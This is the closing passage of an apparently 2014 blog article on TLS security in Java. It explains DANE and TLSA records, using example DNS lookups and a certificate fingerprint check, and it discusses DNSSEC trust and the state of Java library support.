If you are developing a browser that is meant to support HTTPS, please stop here, get a security expert into your team, and only go on with her. This article has shown that using TLS is horribly hard even if you can leverage existing components to perform the actual verification of certificates and hostnames. Writing such checks in a browser-compliant way is far beyond the scope of this piece.

Outlook

DNS + TLS = DANE

Besides of TOFU/POP, which is not yet ready for TLS primetime, there is an alternative approach to link the server name (in DNS) with the server identity (as represented by its TLS certificate): DNS-based Authentication of Named Entities (DANE).

With this approach, information about the server's TLS certificate can be added to the DNS database, in the form of different certificate constraint records:

  • (0) a CA constraint can require that the presented server certificate MUST be signed by the referenced CA public key, and that this CA must be a known Root CA.
  • (1) a service certificate constraint can define that the server MUST present the referenced certificate, and that certificate must be signed by a known Root CA.
  • (2) a trust anchor assertion is like a CA constraint, except it does not need to be a Root CA known to the client. This allows a server administrator to run their own CA.
  • (3) a domain issued certificate is analogous to a service certificate constraint, but like in (2), there is no need to involve a Root CA.

Multiple constraints can be specified to tighten the checks, encoded in TLSA records (for TLS association). TLSA records are always specific to a given server name and port. For example, to make a secure XMPP connection with "zombofant.net", first the XMPP SRV record (_xmpp-client._tcp) needs to be obtained:

$ host -t SRV _xmpp-client._tcp.zombofant.net
_xmpp-client._tcp.zombofant.net has SRV record 0 0 5222 xmpp.zombofant.net.

Then, the TLSA record(s) for xmpp.zombofant.net:5222 must be obtained:

$ host -t TLSA _5222._tcp.xmpp.zombofant.net     
_5222._tcp.xmpp.zombofant.net has TLSA record 3 0 1 75E6A12CFE74A2230F3578D5E98C6F251AE2043EDEBA09F9D952A4C1 C317D81D

This record reads as: the server is using a domain issued certificate (3) with the full certificate (0) represented via its SHA-256 hash (1): 75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D.

And indeed, if we check the server certificate using openssl s_client, the SHA-256 hash does match:

Subject: CN=zombofant.net
Issuer: O=Root CA, OU=http://www.cacert.org, CN=CA Cert Signing Authority/emailAddress=support@cacert.org
Validity
    Not Before: Apr  8 07:25:35 2014 GMT
    Not After : Oct  5 07:25:35 2014 GMT
SHA256 Fingerprint=75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D

Of course, this information can only be relied upon if the DNS records are secured by DNSSEC. And DNSSEC can be abused by the same entities that already can manipulate Root CAs and perform large-scale Man-in-the-Middle attacks. However, this kind of attack is made significantly harder: while a typical Root CA list contains hundreds of entries, with an unknown number of intermediate CAs each, and it is sufficient to compromise any one of them to screw you, with DNSSEC, the attacker needs to obtain the keys to your domain (zombofant.net), to your top-level domain (.net) or the master root keys (.). In addition to that improvement, another benefit of DANE is that server operators can replace (paid) Root CA services with (cheaper/free) DNS records.

However, there is a long way until DANE can be used in Java. Java's own DNS code is very limited (no SRV support, TLSA - what are you dreaming of?) The dnsjava library claims to provide partial DNSSEC verification, there is the unmaintained DNSSEC4j and the GSoC work-in-progress dnssecjava. All that remains is for somebody to step up and implement a DANETrustManager based on one of these components.

Conclusion

Internet security is hard. Let's go bake some cookies!

Comments on HN

Posted 2014-08-05 19:52 Tags: